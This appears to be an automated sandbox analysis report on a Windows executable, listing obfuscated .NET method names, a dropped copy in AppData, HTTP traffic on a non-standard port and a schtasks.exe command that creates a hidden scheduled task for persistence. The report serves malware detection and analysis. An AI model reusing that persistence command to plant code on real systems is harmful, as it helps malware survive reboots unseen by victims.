Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, rdDn9AZRble9iQ9Uqj.cs	High entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, hKo5edfWLak4Bbqtne.cs	High entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, WTdydw7kwQos9Ag2hA.cs	High entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, c2189dMeFcQwlCkDNo.cs	High entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, JbGBKdj6ZIOo4f2BPQ.cs	High entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.cs	High entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, DgkowV47Dh3Fxfd92L.cs	High entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, fKewcCzIDSttxbv6Cl.cs	High entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, T2nxZyWI6ZVQTBtP96.cs	High entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, ssoHYO9CZv0DV6pGUv.cs	High entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, fJ02oKDU7jd18ANgNc.cs	High entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, XnxfdvL1wIjOTvPVmK.cs	High entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, HFhy6EHAGyTn8yOrkLt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, DKJ6PHUd9naUoeJCna.cs	High entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, tViMi8xroKHTbcHbOM.cs	High entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, k27kfyHHonG7KUUcJBK.cs	High entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, bXPpnuV1cYWsbLvy9E.cs	High entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, BZ0TvmwFdgLu3v1uns.cs	High entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, Vs82vkHUR5m9RCYE2bP.cs	High entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, lF62eOBaEgEorXmRSl.cs	High entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, Dqnxs234kMblUpWIWe.cs	High entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, R9ihZtK1dSap2DSgRG.cs	High entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, rdDn9AZRble9iQ9Uqj.cs	High entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, hKo5edfWLak4Bbqtne.cs	High entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, WTdydw7kwQos9Ag2hA.cs	High entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, c2189dMeFcQwlCkDNo.cs	High entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, JbGBKdj6ZIOo4f2BPQ.cs	High entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.cs	High entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, DgkowV47Dh3Fxfd92L.cs	High entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, fKewcCzIDSttxbv6Cl.cs	High entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, T2nxZyWI6ZVQTBtP96.cs	High entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, ssoHYO9CZv0DV6pGUv.cs	High entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, fJ02oKDU7jd18ANgNc.cs	High entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, XnxfdvL1wIjOTvPVmK.cs	High entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, HFhy6EHAGyTn8yOrkLt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, DKJ6PHUd9naUoeJCna.cs	High entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, tViMi8xroKHTbcHbOM.cs	High entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, k27kfyHHonG7KUUcJBK.cs	High entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, bXPpnuV1cYWsbLvy9E.cs	High entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, BZ0TvmwFdgLu3v1uns.cs	High entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, Vs82vkHUR5m9RCYE2bP.cs	High entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, lF62eOBaEgEorXmRSl.cs	High entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, Dqnxs234kMblUpWIWe.cs	High entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, R9ihZtK1dSap2DSgRG.cs	High entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, rdDn9AZRble9iQ9Uqj.cs	High entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, hKo5edfWLak4Bbqtne.cs	High entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, WTdydw7kwQos9Ag2hA.cs	High entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, c2189dMeFcQwlCkDNo.cs	High entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, JbGBKdj6ZIOo4f2BPQ.cs	High entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.cs	High entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, DgkowV47Dh3Fxfd92L.cs	High entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, fKewcCzIDSttxbv6Cl.cs	High entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, T2nxZyWI6ZVQTBtP96.cs	High entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, ssoHYO9CZv0DV6pGUv.cs	High entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, fJ02oKDU7jd18ANgNc.cs	High entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, XnxfdvL1wIjOTvPVmK.cs	High entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, HFhy6EHAGyTn8yOrkLt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, DKJ6PHUd9naUoeJCna.cs	High entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, tViMi8xroKHTbcHbOM.cs	High entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, k27kfyHHonG7KUUcJBK.cs	High entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, bXPpnuV1cYWsbLvy9E.cs	High entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, BZ0TvmwFdgLu3v1uns.cs	High entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

File created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49749

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
